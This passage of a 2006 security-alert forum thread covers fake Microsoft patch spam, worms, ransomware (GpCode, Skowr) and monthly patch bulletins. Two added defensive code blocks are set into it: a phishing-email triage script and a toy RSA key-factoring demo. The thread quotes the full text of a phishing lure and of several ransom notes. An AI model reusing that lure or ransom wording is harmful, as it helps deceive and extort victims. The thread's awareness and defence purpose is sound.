* Follow a multi-layered approach to security. Run both firewall and antivirus applications, at a minimum to provide multiple points of detection and protection to both inbound and outbound threats.
* Be cautious visiting unknown or untrusted websites or following unknown URL links.
* Do not open attachments or executables from unknown sources or that you didn’t request or were unaware of. Always err on the side of caution. Even if the sender is known, the source address may be spoofed.
-
May 30, 2006 at 10:37 am #3156608
PWS-WinPatch – Fake MS Patch being Spammed
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
A new email threat has surfaced which contains a hostile URL that will download a password stealer agent. The email is spoofed to appear like it comes from Microsoft, however the company does not distribute updates in this manner. To stay safe, users should delete all copies of this without clicking on the URL in the email.
PWS-WinPatch – Fake MS Patch being Spammed
http://www.incidents.org/diary.php?storyid=1370
http://www.sophos.com/virusinfo/analyses/trojbeastpwsc.html
http://vil.mcafeesecurity.com/vil/content/v_139619.htm
COPY OF THE NEW TROJAN HORSE ATTACK BEING SPAMMED
From: Microsoft
Sent: Monday, 29 May 2006 7:16 AM
To: Victim
Subject: Microsoft WinLogon Service – Vulnerability Issue
Microsoft Coorporation
A new vulnerability has been discovered in the Microsoft WinLogon Service , that would allow an attacker to gain access to an unpached computer. Since your email is part of our private mail lists and your have succesfully registered your Microsoft Windows , you can download the patch to fix this vulnerability before others do.
Please click the link below to download the patch and protect your computer against WinLogon attacks :
<<URL REMOVED>>
You are free to share this with all your friends and relatives that are using Microsoft Windows Operating System
Thank you
Microsoft Coorp.
-
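The fake-patch spam above and the banking advice earlier in this thread ("never click on URLs found in email", "go directly to your bank's site") both come down to the same checks a mail gateway or help desk can automate: does the sender address belong to the brand the display name claims, do the links point at that brand's domains or at a bare IP address, and does the body use lure wording. The script below is an added example, not from the ISC, Sophos or McAfee write-ups: the two messages are constructed to resemble the spam quoted above and a benign bulletin notice (the link host 198.51.100.7 is a documentation-range placeholder, not the real spammed URL), and BRAND_DOMAINS is this example's own allow-list assumption.

```python
"""Heuristic triage of "patch" and "bank" lure e-mails before anyone clicks.

Added example, not from the ISC, Sophos or McAfee write-ups. SAMPLE_LURE and
SAMPLE_OK are constructed messages; BRAND_DOMAINS is this example's own
allow-list, not a vendor list.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlsplit

# Domains a brand name in the From display name is allowed to use (assumption).
BRAND_DOMAINS = {
    "microsoft": {"microsoft.com"},
    "bank": {"bank.example"},
}
LURE_WORDS = ("vulnerability", "patch", "verify your account", "click the link", "before others")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def _domain_allowed(host, allowed):
    """True if host is one of the allowed domains or a subdomain of one."""
    h = host.lower()
    return any(h == a or h.endswith("." + a) for a in allowed)


def _plain_text_body(msg):
    """Concatenate the text/plain parts (or the single body) as str."""
    parts = [p for p in msg.walk() if p.get_content_type() == "text/plain"] if msg.is_multipart() else [msg]
    return "\n".join((p.get_payload(decode=True) or b"").decode("utf-8", "replace") for p in parts)


def triage(raw_message):
    """Return (score, reasons) for a raw RFC 822 message; higher score = more suspicious."""
    msg = message_from_string(raw_message)
    display, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    body = _plain_text_body(msg)
    score, reasons = 0, []

    # 1. Brand named in the display name must match the sending domain.
    claimed = next((b for b in BRAND_DOMAINS if b in display.lower()), None)
    if claimed and not _domain_allowed(sender_domain, BRAND_DOMAINS[claimed]):
        score += 3
        reasons.append(f"From claims '{display}' but address is @{sender_domain or '?'}")

    # 2. Every link must stay on the claimed brand's domains; bare IPs are a red flag.
    for url in URL_RE.findall(body):
        host = urlsplit(url).hostname or ""
        if claimed and not _domain_allowed(host, BRAND_DOMAINS[claimed]):
            score += 3
            reasons.append(f"link to {host} does not belong to {claimed}")
        if IPV4_RE.match(host):
            score += 2
            reasons.append(f"link uses bare IP address {host}")

    # 3. Urgency / "patch now" wording typical of these lures.
    hits = [w for w in LURE_WORDS if w in body.lower()]
    if hits:
        score += len(hits)
        reasons.append("lure wording: " + ", ".join(hits))

    # 4. Reply-To pointing somewhere other than the From domain.
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    if reply_to and reply_to.rsplit("@", 1)[-1].lower() != sender_domain:
        score += 1
        reasons.append("Reply-To domain differs from From domain")
    return score, reasons


# Constructed sample resembling the spammed message (placeholder link host).
SAMPLE_LURE = """\
From: Microsoft <update@microsoft-patch.example>
To: victim@example.net
Subject: Microsoft WinLogon Service - Vulnerability Issue
Content-Type: text/plain

A new vulnerability has been discovered in the Microsoft WinLogon Service.
Please click the link below to download the patch before others do:
http://198.51.100.7/winlogon-patch.exe
Thank you
"""

# Constructed benign notice: real sender domain, link stays on the brand's domain.
SAMPLE_OK = """\
From: Microsoft Security <secure@microsoft.com>
To: victim@example.net
Subject: Security bulletin summary
Content-Type: text/plain

Bulletins for this month are listed at
http://www.microsoft.com/technet/security/Bulletin/ms06-May.mspx
"""


def triage_samples():
    """Run both constructed samples; handy for a quick demo or test."""
    return {"lure": triage(SAMPLE_LURE), "ok": triage(SAMPLE_OK)}


if __name__ == "__main__":
    for label, (score, reasons) in triage_samples().items():
        print(f"{label}: score={score}", *reasons, sep="\n  ")
```

The score thresholds are deliberately simple; what matters is that each reason is a concrete, explainable fact a user can be shown (the claimed brand, the actual sender domain, the link host), which is exactly what the "call the bank directly" and "go directly to your bank's site" advice asks people to verify by hand.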
May 31, 2006 at 10:39 am #3157722
Lecna.A — Network Walker uses Rootkit approach
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus spreads through non-secure network shares in a similar manner as the LovGate series. It also includes a backdoor to further compromise security, along with rootkit techniques to better hide its presence from AV software.
Lecna.A — Network Walker uses Rootkit approach
http://secunia.com/virus_information/29583/lecna.a/
http://www.sarc.com/avcenter/venc/data/w32.lecna.a.html
W32.Lecna.A is a worm that spreads through network shares by exploiting vulnerabilities. The worm opens a back door to allow a remote attacker to have unauthorized access to the compromised computer. It uses rootkit technology to hide its presence and may attempt to download malicious files from the Internet.
-
May 31, 2006 at 10:40 am #3157721
Stardust Macro Virus – Designed to infect Open Office documents
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new macro virus is not a true threat to the Open Office environment yet, as it’s not in the wild currently. Still, all environments must be carefully watched to ensure the best safety practices are in place.
Stardust – New POC macro virus designed to infect Open Office documents
http://secunia.com/virus_information/29582/xmldustar.a/
Stardust is a new proof-of-concept macro virus that affects StarOffice and OpenOffice (OO) Suites. This macro virus then proceeds to infect OO based document files. It is written in Star Basic. It affects systems running on Windows 98, ME, NT, 2000, XP, and Server 2003 with StarOffice/OpenOffice Suites installed.
-
June 3, 2006 at 6:26 am #3166165
Microsoft Advisory 919637 – Updated Info on Word vulnerability
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Microsoft has published additional info in their FAQ section for the Word vulnerability where some very limited zero day attacks have occurred. ETA for release will be during “Patch Tuesday” on June 13th.
Microsoft Security Advisory (919637)
Vulnerability in Word Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/919637.mspx
QUOTE: The security update is now being finalized through testing to ensure quality and application compatibility and is on schedule to be released as part of the June security updates on June 13, 2006, or sooner as warranted
-
June 3, 2006 at 6:26 am #3166166
Firefox & Thunderbird 1.5.0.4 – Security Release
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
All current users should move to the latest versions to help stay safe from a security perspective.
What’s new in Firefox 1.5.0.4
http://www.mozillazine.org/talkback.html?article=8763
http://www.mozilla.com/firefox/releases/1.5.0.4.html
http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox1.5.0.4
Thunderbird 1.5.0.4
http://www.mozillazine.org/talkback.html?article=8767
http://www.mozilla.com/thunderbird/releases/1.5.0.4.html
http://www.mozilla.org/projects/security/known-vulnerabilities.html#thunderbird1.5.0.4SeaMonkey 1.0.2
http://www.mozillazine.org/talkback.html?article=8761ISC Notification
http://www.incidents.org/diary.php?storyid=1377An easy method for Firefox users to check for and install new updates:
1. Find “Help” on menu bar
2. Click on “Check for Updates” -
June 5, 2006 at 2:27 pm #3164904
CBS Market Watch Article: Be Careful with EMAIL at work
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
CBS Market Watch Article: Be Careful with EMAIL at work
QUOTE: Almost one-third of companies said they’ve fired an employee in the last 12 months for violating e-mail policies and 52% of the companies said they have disciplined an employee for violating e-mail rules in the past year, according to a survey of 294 U.S. firms with 1,000 or more workers.
Thirty-eight percent of companies said they employ staff to read or analyze outgoing e-mail messages, and that jumps to 44% of companies with 20,000 or more employees, according to the survey, conducted by Forrester Consulting for Proofpoint Inc., which makes anti-spam and e-mail monitoring tools for companies. About half of the companies said they regularly audit outbound e-mail content.
“There are legitimate reasons for companies to monitor e-mail,” said Keith Crosley, director of market development at Proofpoint, in Cupertino, Calif. “There is so much risk associated with e-mail. The companies we’re talking about here have records on many thousands of customers. You really need to protect that data. E-mail is one of the least secure systems,” he said. “It’s very easy to inadvertently reveal massive amounts of customer data.”
The message to workers is “don’t put anything in e-mails that you wouldn’t want the whole world to read,” Crosley said. “That would be a difficult ideal to live up to,” he said, but, absent that, workers should at least abide by their company’s policy for acceptable e-mail use.
-
June 5, 2006 at 10:26 pm #3165441
Malware can hide in a 1×1 pixel
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
An excellent ISC article documents how malware can hide within a single dot (pixel) on the screen. All browsers should be kept up to date with security updates.
http://www.incidents.org/diary.php?storyid=1380
-
June 6, 2006 at 6:29 am #3165341
UNIX Downloader.A – New Virus manipulates WGET command
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
This new virus is low risk and not prevalent in the wild. Although UNIX malware is rare, this new threat illustrates the need to protect all environments.
UNIX Downloader.A – New Virus manipulates WGET command
This Unix malware arrives as a downloaded file from the Internet. Upon execution, it connects to the Internet using TCP port 8080. Once a connection is established, it utilizes the application Wget to download and execute ELF_LUPPER.F and ELF_KAITEN.AQ from specific URLs.
-
June 6, 2006 at 9:07 am #3165261
Kaspersky – Top 20 virus incidents for May 2006
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
Kaspersky has published their Top 20 virus incidents for May 2006. MyTob, Netsky, and LovGate variants were the primary leading virus malware reported.
Kaspersky – Overall Top 20
http://www.viruslist.com/en/viruses/analysis?pubid=187865529
Top 20 based on Online Cleaner scans
http://www.viruslist.com/en/viruses/analysis?pubid=187865525
-
June 6, 2006 at 1:01 pm #3164459
GpCode.af Virus – uses RSA 330-bit encryption to hold users hostage
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
GpCode.af is a brand new virus variant that uses RSA 330-bit encryption to hold users hostage. As Kaspersky recommends, infected users should not send email or payments to these malicious individuals to decrypt files.
KASPERSKY ESCALATES WARNING TO SEVERE RISK
http://www.viruslist.com/en/viruses/alerts?alertid=188171360
Kaspersky Lab has received reports of yet another variant of GpCode, the cyberblackmail virus: Virus.Win32.GpCode.af. This new variant is currently spreading on the Russian Internet. It encrypts user files; the author then demands money for decrypting the files.
This latest variant differs from the one that appeared last Thursday in that it uses a more secure encryption algorithm – RSA 330 bit rather than the RSA 260 bit key the previous variant used.
Kaspersky Lab strongly recommends that anyone who has had files encrypted should contact the Virus Lab. Under no circumstances should users give in to blackmail, as this will encourage the authors of this program to create new versions.
TECHNICAL DETAILS of AE version (RSA 260 bit version)
http://www.viruslist.com/en/viruses/encyclopedia?virusid=123334
This malicious program encrypts files on the victim machine. The virus itself is a Windows PE EXE file approximately 62KB in size, packed using UPX. The unpacked file is approximately 134KB in size. This program was spammed throughout the Russian Internet. Once launched, the virus will encrypt files which it finds on the victim machine.
Once encrypted, files cannot be used. The author of the program then demands money to decrypt the encrypted files. A file called ‘readme.txt’ is created in folders where encrypted files are located. The file contains the following text
Some files are coded by RSA method.
To buy decoder mail: ***** @ mail . ru
with subject: REPLY
The email address shown may differ from modification to modification of this virus. If contacted by the user, the author of the program will demand payment for decrypting the encrypted files.
KASPERSKY WEBLOG ENTRIES
http://www.viruslist.com/en/weblog?weblogid=188229974
In comparison to the previous variant, GpCode.ae, which we detected last week, this new variant uses a stronger encryption algorithm (RSA 330 bit); this makes it more difficult for our virus analysts to develop decryption. However, we’ve been successful, and we added detection and decryption for infected files to our antivirus databases.
Users who have been infected by GpCode.af should download the latest antivirus databases and fully scan their computers. One point that we want to stress: at the moment, we’re still not 100% sure how this virus penetrates victim computers. You should exert maximum caution: don’t launch files that you receive via email, and ensure that your operating system and browser are fully patched.
Finally, back up your data on a regular basis. Then if the worst ever does happen – and we hope it won’t – you’ll still have a copy of whatever you were working on.
-
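The Kaspersky material quoted in the post above turns on RSA key length: the .ae variant's 260-bit key and the .af variant's 330-bit key were both short enough for the lab to produce decryption, though the post does not say how that was done. The block below is an added example, not Kaspersky's code and not the malware's, and it shows the one route that key length directly controls: factoring the public modulus to recover the private exponent and decrypting without paying. The key is built from two constructed primes (2^31-1 and 2^32-5) so that Pollard's rho finishes in well under a second; this same code would not finish on a 330-bit modulus, and a 2048-bit one is far out of reach, which is exactly why the key size mattered to the analysts.

```python
"""Toy illustration of why RSA key length decides a ransomware scheme.

Added example, not Kaspersky's or the malware author's code.  The primes are
constructed: 31- and 32-bit, so factoring is instant.  The 260/330-bit keys
in the GpCode write-up are much harder; a modern 2048-bit key is infeasible.
"""

from math import gcd

# Constructed toy key material (NOT a key from any real sample).
TOY_P = 2147483647   # 2**31 - 1, a Mersenne prime
TOY_Q = 4294967291   # 2**32 - 5, the largest prime below 2**32
TOY_E = 65537
BLOCK_BYTES = 7      # 56-bit blocks stay below the ~63-bit modulus


def public_key(p: int = TOY_P, q: int = TOY_Q, e: int = TOY_E) -> tuple[int, int]:
    """Return (n, e); the public half is all a victim's machine ever holds."""
    return p * q, e


def encrypt_bytes(data: bytes, n: int, e: int) -> list[tuple[int, int]]:
    """Textbook RSA over fixed-size blocks (no padding, as in a toy scheme).

    Each block is stored with its length so leading zero bytes survive decryption.
    """
    out = []
    for i in range(0, len(data), BLOCK_BYTES):
        chunk = data[i:i + BLOCK_BYTES]
        out.append((pow(int.from_bytes(chunk, "big"), e, n), len(chunk)))
    return out


def decrypt_bytes(blocks: list[tuple[int, int]], n: int, d: int) -> bytes:
    return b"".join(pow(c, d, n).to_bytes(length, "big") for c, length in blocks)


def pollard_rho(n: int) -> int:
    """Return a non-trivial factor of composite n (Pollard's rho, Floyd cycle finding).

    Expected cost is about sqrt(smallest prime factor) modular squarings, which
    is why a 63-bit n falls instantly while a 330-bit one needs real resources.
    """
    if n % 2 == 0:
        return 2
    c = 1
    while True:
        x = y = 2
        d = 1
        while d == 1:
            x = (x * x + c) % n          # tortoise: one step
            y = (y * y + c) % n          # hare: two steps
            y = (y * y + c) % n
            d = gcd(abs(x - y), n)
        if d != n:
            return d
        c += 1                           # degenerate cycle: retry with another polynomial


def recover_private_exponent(n: int, e: int) -> int:
    """Factor n, then derive d exactly as the legitimate key owner would have."""
    p = pollard_rho(n)
    q = n // p
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def decrypt_without_paying(blocks: list[tuple[int, int]], n: int, e: int) -> bytes:
    """The defender's route when the modulus is short: recover d from (n, e)."""
    return decrypt_bytes(blocks, n, recover_private_exponent(n, e))


if __name__ == "__main__":
    n, e = public_key()
    ransomed = encrypt_bytes(b"Some files are coded by RSA method.", n, e)
    print(decrypt_without_paying(ransomed, n, e))
```

The block deliberately leaves out padding and any symmetric layer; the point is only that the private exponent falls out of the public modulus once the modulus can be factored, and that the factoring step is the one whose cost grows with key size.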
June 6, 2006 at 1:01 pm #3164458
McAfee’s AVERT Labs – New Blog for Malware Developments
by harry waldron, cpcu, ccp · about 17 years, 10 months ago
In reply to Harry Waldron
AVERT Labs has developed a new Blog facility to provide commentary on the latest malware developments. This will complement their good portal facilities. These sites are all good resources to bookmark.
New AVERT Labs Blog
http://www.avertlabs.com/research/blog/
AVERT Labs Portal
http://myavert.avertlabs.com/myavert/default.aspx
McAfee Threat Center
http://www.mcafee.com/us/threat_center/default.asp
-
June 7, 2006 at 1:02 pm #3145210
AVERT Labs Blog – Keeping Children Safe on the Internet
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Excellent Advice for both children and adults … Stay as anonymous as possible on the Internet to ensure both privacy and safety. As parents take the time to teach your children safety and responsibility while using the great resources available to us via the Internet.
McAfee AVERT Blogs – Security and Children’s Web Sites
http://www.avertlabs.com/research/blog/?p=22
QUOTE: It’s always a good time to discuss computer security issues with your children. Here’s some thoughts to start:
1) Generally, don’t talk to strangers. Unfortunately, children are not going to abide by this, as part of the fun of online games is to meet and play with other people.
2) Don’t tell anyone your real full name. A first name should be good enough.
3) Don’t tell anyone your age.
4) Don’t tell anyone where you live. For purposes of playing with new-found friends on-line, just tell them the state, or the time zone and when it would be possible to play together again.
5) To register online for games, don’t give out your birthday! As a general rule, always use January 1st. If the site has a requirement to verify the user’s age, then the year of birth could be used. But all online birthdays should be January 1st. (All horses have a birthday of January 1.)
6) Many sites now ask only for your zip code. But even there, if you’ve ever lived at a different address than you do now, use that old zip code. In fact, if the site is not going to be actually sending you anything via US Mail, use that old address for all registrations.
7) Establish an online email account for the purpose of using it as the registration email address for any online registration.
8) Establish an answer to the online “security” questions, like “Name of favorite pet” or “Mother’s maiden name”. Especially for something like “Mother’s maiden name” which is actually used for identity purposes later in life, make up an answer. If your children have a school mascot, what’s its name? And just use that same answer for all the *online game* registrations.
9) And if there?s going to be money involved, always require that a parent be involved.
-
June 8, 2006 at 9:03 am #3143519
Sarbanes-Oxley Forums – Thwarting Hacker Techniques
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is a link to the SOX forums, where one of our SOX Gurus (milan) shares an excellent document. Some quick lists were also shared related to controlling the two primary facets of security (e.g., the technology and the human behavioral controls), as noted below:
Sarbanes-Oxley Forums – Thwarting Hacker Techniques
PART ONE — Technological defense systems
1. Keep your operating systems and all software patched (install patches expediently and use tools like WSUS, SMS, etc to roll these out in a productive fashion)
2. Use a commercial grade multi-tier Firewall system
3. Use a good commercial “best in the industry” standard AV defense system with centralized alerting and logging (e.g., corporate versions of Trend, McAfee, etc)
4. Anti-Spyware defense software
5. Intrusion Detection software
6. Network Vulnerability Assessment tools (STAT, RealSecure, KSA, Bindview, Nexus, MSBA, etc)
PART TWO — “Security is a Process”
While you can have the best technological defenses in the world, security must be emphasized to everyone as a “living & breathing” process. For example, you can have the best locks in the world on the “hen house” — but if the chickens “let the fox in”, those technological locks won’t do a bit of good.
A quick list of ideas:
1. Security Awareness program – Users need to know risks, best practices, etc … Security = SEC-U-R-IT-Y (i.e., “you are it”). An awareness program can be formal classes, a monthly newsletter, internal corporate email alerts when viruses are inside the company, best practices, etc.
2. Policies, Procedures, and Standards – to help control human behavioral risks
3. Develop a comprehensive security web site on your Intranet, so it’s easily accessible and referenceable with all policies and other information to help educate the user.
4. Actively monitor the network (check IDS and Firewall alerts, Port Traffic spikes, etc)
5. Proactively monitor emerging security risks and take precautions when new threats escalate publicly.
6. Actively test your networks on a quarterly basis for exposures and conduct a more thorough annual penetration test
7. In developing new systems or solutions, design security up-front rather than making it an “after thought”
8. In granting security, employ minimalist security rights giving folks just what they need from an access perspective
9. Avoid giving users root or local admin authority on their client workstations
10. Use a continuous improvement theme when it comes to security controls.
-
June 8, 2006 at 9:03 am #3143520
Phishing Attacks – New approach for fake URLs
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Kaspersky shares a tactic where a “fake URL frame” is inserted into the HTML code and the Paypal screen is expanded to full screen mode to hide the true URL. The key way to stay protected is to never click on URLs in an email solicitation. Instead go to the legitimate site by keying the name of the site into your browser, if you wish to donate or contact someone.
-
June 9, 2006 at 9:12 am #3144316
New phpBB version 2.0.21 release contains security improvements
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All sites using phpBB should move to the latest version to ensure the best level of security protection as well as improved functionality.
http://www.incidents.org/diary.php?storyid=1390
phpBB version 2.0.21 was released. There are some minor security improvements in the code, check the announcement for more details. Most of the code changes appear to be more functionality oriented than security oriented.
Considering the level of attention phpBB gets from the bad guys out there, it’s best not to hesitate for long and upgrade really soon.
-
June 11, 2006 at 9:11 am #3145051
MS06-015 will not provide patch for windows 98 and ME
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
As Windows 98 and ME have reached “product end-of-life”, Microsoft will no longer provide security updates. While there are a number of users who still use W/98 in particular, they should continue to employ the safest practices at all times until they can purchase a new PC.
MS06-015 will not provide patch for windows 98 and ME
http://www.incidents.org/diary.php?storyid=1394
Quote: Microsoft announced that they will not provide a patch for Windows 98 and ME for MS06-015 “Vulnerability in Windows Explorer Could Allow Remote Code Execution (908531)”. The choice appears to be related to the amount of effort needed to patch the problem and the fact that those Operating systems reach the end of their lifecycle on June 11th.
-
June 11, 2006 at 9:12 am #3145050
Microsoft Security Updates – Huge "Patch Tuesday" release on 06/13/2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There appears to be about a dozen patches coming on June 13th: Windows (9), Office (2), and Exchange (1). Also, non-security changes are forecast for ActiveX and Windows/MS Update controls.
Microsoft Security Updates – June 2006 Preview http://www.microsoft.com/technet/security/bulletin/advance.mspx
http://www.incidents.org/diary.php?storyid=1395
-
June 12, 2006 at 5:11 pm #3145507
Skowr – Ransomware Trojan encrypts and demands payment
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The Skowr trojan is yet another ransomware threat that can impact users opening spam email attachments or URLs which can download malware code. Always backup important files and be careful in handling any email message.
Skowr – Ransomware Trojan encrypts and demands payment
http://secunia.com/virus_information/29779/skowr/
QUOTE: Skowr is a trojan that scans the hard drive of an infected machine for certain file types, attempts to encrypt them and delete the original files. It then issues a ransom demand in an attempt to extort money from the victim, in order for them to obtain the password to recover the encrypted files.
RANSOM NOTE:
WARNING: FILE ENCRYPTION HAS BEEN FINISHED!
############################################
Dear User,
———-
Some Ascii Files have been encrypted with the sk0r alias Czybik’s Ascii File Encryption Engine v1.0. You are not longer able to use those files. But now nothing is lost. You are able to use your files again if you decrypt them. To do this you need to buy a decoder and the password. So how can you buy this? The following stepps will show you what to do:
Decryption Notes:
=================
1) Simply write an email to: ********* with subject: Need Decoder and Password
2) Wait for an email from me.
3) Read the email and follow the stepps (you must give a payment to me to get the decoder and the password
4) Open the decoder.exe
5) Input File and Password and click decrypt –> Do this for all encrypted files
Pricelist:
==========
Decoder: Game Accounts in worth of about maximum 80 €.
Password: Game or Internet Accounts (Websites) in worth of maximum 20 €
You see you can be lucky that the Decoder and the Password are so cheap. Be lucky you are not a victim of other Ransomware, they are very expensive (400$) So please follow the stepps. Otherwise you will not be able to use your files again. Don ‘t send to avers. They will not be able to get or crack the password. So pay or say ‘bye’ to all your encrypted files.
Regards: sk0r / Czybik – Malwarewriter
Win32.Skowor Ransomware ©2006 by sk0r / Czybik
sk0r alias Czybik’s Ascii File Encryption Engine v1.0 ©2006 by sk0r / Czybik
-
June 12, 2006 at 5:11 pm #3145508
JS.Yamanner – Spreads via Yahoo’s free email facility
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Yamanner is a new JavaScript based Trojan horse that manipulates and “harvests” Yahoo email account contacts.
JS.Yamanner – Spreads via Yahoo’s free email facility
http://secunia.com/virus_information/29782/js.yamanner/
http://www.sarc.com/avcenter/venc/data/js.yamanner@m.html
QUOTE: JS.Yamanner@m is a worm that is written in JavaScript. It exploits a vulnerability in the Yahoo email service to send a copy of itself to the user’s Yahoo email contacts.
EMAIL to AVOID:
From: Varies
Subject: New Graphic Site
Message body: Note: forwarded message attached.
-
June 13, 2006 at 9:12 am #3141490
Tech Republic’s Top 10 Security Tips
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
There are a number of “Top 10s” in this list:
-
June 13, 2006 at 1:11 pm #3164799
Microsoft Security Bulletin Summary for June, 2006
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The June updates required over 20MB of downloading to accomplish all the Windows, IE, and Office patches. There are several critical updates including a patch to Word where a zero day exploit had surfaced in the past couple of weeks.
Microsoft Security Bulletin Summary for June, 2006
http://www.microsoft.com/technet/security/bulletin/ms06-jun.mspx
-
June 15, 2006 at 5:11 pm #3154933
IE/Firefox URL exploits in email impacting Australia
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
As shared by the Internet Storm Center, always avoid clicking on URLs in suspicious email messages.
E-mails with malicious links targeting Australia
http://www.incidents.org/diary.php?storyid=1417
We’ve received a couple of reports about e-mails being spammed which contain browser exploits. What’s interesting about this is that they are targeting Australia.
The URL contains an obfuscated JavaScript. The JavaScript code will check which browser the user is running and will redirect him to the appropriate exploit, served by a CGI script. The JavaScript will also detect if a user is running Service Pack 2, and append that information as a CGI parameter as well.
The following Internet Explorer vulnerabilities are exploited: MS03-011, MS06-006, MS06-014. And one Mozilla Firefox vulnerability is exploited as well: MFSA2005-50
For Firefox users, there is a good add-on tool for preventing malicious JavaScript. The add-on is called “NoScript”. You can find more information at the following site:
https://addons.mozilla.org/firefox/722/
Quote: TEXT OF MALICIOUS EMAIL MESSAGE “People starting panic withdrawals, some of the accounts were reported closed due to technical reasons, many ATMs are not operating. Does it seem that one of the Australia’s greatest goes bankrupt? The full story could be found here: <URL> Well, hope that isn’t true… Anyway You’d rather check your balance…”
-
June 15, 2006 at 5:11 pm #3154934
Microsoft Security Bulletins – June 2006 more detailed information
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Below is a more detailed version of what we’re patching this month as it’s the largest security release by Microsoft in over a year … No issues so far with both my laptop and desktop XP SP2 systems at work
CRITICAL BULLETINS
MS06-021: Cumulative Security Update for Internet Explorer (916281)
http://www.microsoft.com/technet/security/bulletin/ms06-021.mspx
MS06-022: Vulnerability in ART Image Rendering Could Allow Remote Code Execution (918439)
http://www.microsoft.com/technet/security/bulletin/ms06-022.mspx
MS06-023: Vulnerability in Microsoft JScript Could Allow Remote Code Execution (917344)
http://www.microsoft.com/technet/security/bulletin/ms06-023.mspx
MS06-024: Vulnerability in Windows Media Player Could Allow Remote Code Execution (917734)
http://www.microsoft.com/technet/security/bulletin/ms06-024.mspx
MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
MS06-026: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (918547)
Note – only impacts W/98
http://www.microsoft.com/technet/security/bulletin/ms06-026.mspx
MS06-027: Vulnerability in Microsoft Word Could Allow Remote Code Execution (917336)
http://www.microsoft.com/technet/security/bulletin/ms06-027.mspx
MS06-028: Vulnerability in Microsoft PowerPoint Could Allow Remote Code Execution (916768)
http://www.microsoft.com/technet/security/bulletin/ms06-028.mspx
MODERATE BULLETINS
MS06-031: Vulnerability in RPC Mutual Authentication Could Allow Spoofing (917736)
Note – only impacts W/2000
http://www.microsoft.com/technet/security/bulletin/ms06-031.mspx
IMPORTANT BULLETINS
MS06-029: Vulnerability in Microsoft Exchange Server Running Outlook Web Access Could Allow Script Injection (912442)
http://www.microsoft.com/technet/security/bulletin/ms06-029.mspx
MS06-030: Vulnerability in Server Message Block Could Allow Elevation of Privilege (914389)
http://www.microsoft.com/technet/security/bulletin/ms06-030.mspx
MS06-032: Vulnerability in TCP/IP Could Allow Remote Code Execution (917953)
http://www.microsoft.com/technet/security/bulletin/ms06-032.mspx
INTERNET STORM CENTER – ANALYSIS OF EACH BULLETIN
Microsoft patch day
Published: 2006-06-13,
Last Updated: 2006-06-14 10:18:05 UTC by Swa Frantzen (Version: 1)
Microsoft is releasing today 12 new security bulletins:
- MS06-021 Cumulative patch for Internet Explorer – Critical
- MS06-022 ART image library buffer overflow – Critical
- MS06-023 Microsoft JScript memory corruption – Critical
- MS06-024 Windows media player – Critical
- MS06-025 RRAS – Critical
- MS06-026 Graphics rendering engine remote code execution – Critical
- MS06-027 Word remote code execution – Critical
- MS06-028 Powerpoint remote code execution -Critical
- MS06-029 Exchange – Important
- MS06-030 SMB privilege escalation – Important
- MS06-031 RPC mutual authentication spoofing – Moderate
- MS06-032 IP source routing allows remote code execution – Important
and re-released one:
-
June 15, 2006 at 5:11 pm #3154935
Microsoft June Security Updates – New Exploits Surfacing
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All users should patch their systems expediently, as some of these exploits could be crafted into viruses
Microsoft June Security Updates – New Exploits Surfacing
http://www.incidents.org/diary.php?storyid=1415
After yesterday’s patch day, we start to receive a number of reports about newly released exploits for vulnerabilities announced on Tuesday. Here is a quick list of what we have seen so far:
MS06-024: Windows Media Player — Exploit released by penetration testing vendor to customers.
MS06-025: RRAS — Exploit released by penetration testing vendor to customers.
MS06-027: Word remote code execution — Exploit available before release of patch.
MS06-030: SMB Privilege Escalation — Two exploits released to the public.
MS06-032: IP Source Routing Exploit — DoS exploits released privately (trivial exploit)
-
June 16, 2006 at 1:12 pm #3268573
Mdropper.J – Zero Day Excel based Exploit
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Users should be cautious with all unusual attachments from unexpected or suspicious email, including Excel documents where a new attack has recently surfaced. Microsoft is working on this issue as noted in the MSRC blog.
Mdropper.J – Zero Day Excel based Exploit
